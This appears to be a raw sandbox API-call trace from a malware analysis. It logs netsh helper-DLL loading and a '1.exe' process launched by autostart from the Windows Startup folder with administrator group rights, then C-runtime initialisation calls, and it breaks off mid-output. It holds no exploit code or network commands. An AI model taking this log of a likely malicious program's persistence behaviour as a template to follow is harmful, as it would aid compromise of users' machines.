RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x12) returned 0x22b43de3630 [0066.729] GetProcessHeap () returned 0x22b43db0000 [0066.729] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x1a) returned 0x22b43dfa800 [0066.729] _wcsupr (in: _String="WcnNetsh.dll" | out: _String="WCNNETSH.DLL") returned="WCNNETSH.DLL" [0066.729] GetProcessHeap () returned 0x22b43db0000 [0066.729] RtlFreeHeap (HeapHandle=0x22b43db0000, Flags=0x0, BaseAddress=0x22b43de0be0) returned 1 [0066.729] LoadLibraryExW (lpLibFileName="WCNNETSH.DLL", hFile=0x0, dwFlags=0x0) returned 0x7ff9106d0000 [0067.251] GetProcAddress (hModule=0x7ff9106d0000, lpProcName="InitHelperDll") returned 0x7ff9106d1680 [0067.251] InitHelperDll () returned 0x0 [0067.251] RegisterHelper () returned 0x0 [0067.251] GetProcessHeap () returned 0x22b43db0000 [0067.251] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0xec8) returned 0x22b43dff2b0 [0067.251] GetProcessHeap () returned 0x22b43db0000 [0067.251] RtlFreeHeap (HeapHandle=0x22b43db0000, Flags=0x0, BaseAddress=0x22b43dfe430) returned 1 [0067.251] RegEnumValueW (in: hKey=0xb4, dwIndex=0xf, lpValueName=0x22b43dc0920, lpcchValueName=0x69b61675c0, lpReserved=0x0, lpType=0x0, lpData=0x22b43db88c0, lpcbData=0x69b6167618 | out: lpValueName="whhelper", lpcchValueName=0x69b61675c0, lpType=0x0, lpData=0x22b43db88c0, lpcbData=0x69b6167618) returned 0x0 [0067.251] _wcsicmp (_String1="whhelper.dll", _String2="ipxmontr.dll") returned 14 [0067.251] _wcsicmp (_String1="whhelper.dll", _String2="ipxpromn.dll") returned 14 [0067.251] GetProcessHeap () returned 0x22b43db0000 [0067.251] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x2a8) returned 0x22b43df9a50 [0067.251] GetProcessHeap () returned 0x22b43db0000 [0067.251] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x12) returned 0x22b43de36d0 [0067.251] GetProcessHeap () returned 0x22b43db0000 [0067.251] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x1a) returned 0x22b43dfa3e0 [0067.251] _wcsupr (in: _String="whhelper.dll" | out: _String="WHHELPER.DLL") returned="WHHELPER.DLL" [0067.251] GetProcessHeap () returned 0x22b43db0000 [0067.252] RtlFreeHeap (HeapHandle=0x22b43db0000, Flags=0x0, BaseAddress=0x22b43de0e40) returned 1 [0067.252] LoadLibraryExW (lpLibFileName="WHHELPER.DLL", hFile=0x0, dwFlags=0x0) returned 0x7ff914b30000 [0068.284] GetProcAddress (hModule=0x7ff914b30000, lpProcName="InitHelperDll") returned 0x7ff914b314d0 [0068.284] InitHelperDll () returned 0x0 [0068.284] RegisterHelper () returned 0x0 [0068.284] GetProcessHeap () returned 0x22b43db0000 [0068.284] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0xf20) returned 0x22b43e00180 [0068.284] GetProcessHeap () returned 0x22b43db0000 [0068.284] RtlFreeHeap (HeapHandle=0x22b43db0000, Flags=0x0, BaseAddress=0x22b43dff2b0) returned 1 [0068.284] RegEnumValueW (in: hKey=0xb4, dwIndex=0x10, lpValueName=0x22b43dc0920, lpcchValueName=0x69b61675c0, lpReserved=0x0, lpType=0x0, lpData=0x22b43db88c0, lpcbData=0x69b6167618 | out: lpValueName="wlancfg", lpcchValueName=0x69b61675c0, lpType=0x0, lpData=0x22b43db88c0, lpcbData=0x69b6167618) returned 0x0 [0068.284] _wcsicmp (_String1="wlancfg.dll", _String2="ipxmontr.dll") returned 14 [0068.284] _wcsicmp (_String1="wlancfg.dll", _String2="ipxpromn.dll") returned 14 [0068.284] GetProcessHeap () returned 0x22b43db0000 [0068.284] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x2d0) returned 0x22b43df9d00 [0068.284] GetProcessHeap () returned 0x22b43db0000 [0068.284] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x10) returned 0x22b43de36f0 [0068.284] GetProcessHeap () returned 0x22b43db0000 [0068.284] RtlAllocateHeap (HeapHandle=0x22b43db0000, Flags=0x0, Size=0x18) returned 0x22b43de3710 [0068.284] _wcsupr (in: _String="wlancfg.dll" | out: _String="WLANCFG.DLL") returned="WLANCFG.DLL" [0068.284] GetProcessHeap () returned 0x22b43db0000 [0068.284] RtlFreeHeap (HeapHandle=0x22b43db0000, Flags=0x0, BaseAddress=0x22b43df9a50) returned 1 [0068.285] LoadLibraryExW (lpLibFileName="WLANCFG.DLL", hFile=0x0, dwFlags=0x0) Thread: id = 38 os_tid = 0xf44 Thread: id = 39 os_tid = 0xe40 Process: id = "9" image_name = "1.exe" filename = "c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\1.exe" page_root = "0x7b560000" os_pid = "0xdd4" os_integrity_level = "0x2000" os_privileges = "0x40800000" monitor_reason = "autostart" parent_id = "0" os_parent_pid = "0x0" cmd_line = "\"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\1.exe\" " cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:000129f0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 44 os_tid = 0xdd8 [0129.115] GetStartupInfoW (in: lpStartupInfo=0x133fa58 | out: lpStartupInfo=0x133fa58*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\1.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0129.115] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0129.115] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x2fb0000 [0129.120] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74440000 [0129.120] GetProcAddress (hModule=0x74440000, lpProcName="FlsAlloc") returned 0x74454ae0 [0129.120] GetProcAddress (hModule=0x74440000, lpProcName="FlsGetValue") returned 0x74454b20 [0129.120] GetProcAddress (hModule=0x74440000, lpProcName="FlsSetValue") returned 0x74454b40 [0129.120] GetProcAddress (hModule=0x74440000, lpProcName="FlsFree") returned 0x74454b00 [0129.121] RtlAllocateHeap (HeapHandle=0x2fb0000, Flags=0x8, Size=0x214) returned 0x2fb05a8 [0129.121] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74440000 [0129.121] GetCurrentThreadId () returned 0xdd8 [0129.121] GetStartupInfoW (in: lpStartupInfo=0x133f9f4 | out: lpStartupInfo=0x133f9f4*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\1.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x12726a, hStdOutput=0x1275a3, hStdError=0x2fb05a8)) [0129.121] RtlAllocateHeap (HeapHandle=0x2fb0000, Flags=0x8, Size=0x800) returned 0x2fb07c8 [0129.121] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0129.121] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0129.121] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0129.121] SetHandleCount (uNumber=0x20) returned 0x20 [0129.121] GetCommandLineA () returned="\"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\1.exe\" " [0129.121] GetEnvironmentStringsW () returned 0x15afad8* [0129.122] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1410, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1410 [0129.122] RtlAllocateHeap (HeapHandle=0x2fb0000, Flags=0x0, Size=0x582) returned 0x2fb0fd0 [0129.122] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1410, lpMultiByteStr=0x2fb0fd0, cbMultiByte=1410, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=::=::\\", lpUsedDefaultChar=0x0) returned 1410 [0129.122] FreeEnvironmentStringsW (penv=0x15afad8) returned 1 [0129.122] GetLastError () returned 0xcb [0129.122] SetLastError (dwErrCode=0xcb) [0129.122] GetLastError () returned 0xcb [0129.122] SetLastError (dwErrCode=0xcb) [0129.122] GetLastError () returned 0xcb [0129.122] SetLastError (dwErrCode=0xcb) [0129.122] GetACP () returned 0x4e4 [0129.122] RtlAllocateHeap (HeapHandle=0x2fb0000, Flags=0x0, Size=0x220) returned 0x2fb1560 [0129.122] GetLastError () returned 0xcb [0129.122] SetLastError (dwErrCode=0xcb) [0129.122] IsValidCodePage (CodePage=0x4e4) returned 1 [0129.122] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x133f9bc | out: lpCPInfo=0x133f9bc) returned 1 [0129.122] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x133f488 | out: lpCPInfo=0x133f488) returned 1 [0129.122] GetLastError () returned 0xcb [0129.122] SetLastError (dwErrCode=0xcb) [0129.122] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x133f89c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0129.123] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x133f89c, cbMultiByte=256, lpWideCharStr=0x133f208, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ鵧\x12Ā") returned 256 [0129.123] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ鵧\x12Ā", cchSrc=256, lpCharType=0x133f49c | out: lpCharType=0x133f49c) returned 1 [0129.123] GetLastError () returned 0xcb [0129.123] SetLastError (dwErrCode=0xcb) [0129.123] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x133f89c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0129.123] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x133f89c, cbMultiByte=256, lpWideCharStr=0x133f1d8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0129.123] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0129.123] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x133efc8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ") returned 256 [0129.123] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ", cchWideChar=256, lpMultiByteStr=0x133f79c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x34\xbf\x70\x34\xd4\xf9\x33\x01\x8f\x7b\x12", lpUsedDefaultChar=0x0) returned 256 [0129.123] GetLastError () returned 0xcb [0129.123] SetLastError (dwErrCode=0xcb) [0129.123] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x133f89c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0129.123] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x133f89c, cbMultiByte=256, lpWideCharStr=0x133f1f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0129.123] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0129.123] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x133efe8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ") returned 256 [0129.123] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ", cchWideChar=256, lpMultiByteStr=0x133f69c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xf7\xd8\xd9\xda\xdb\xdc\xdd\xde\x9f\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb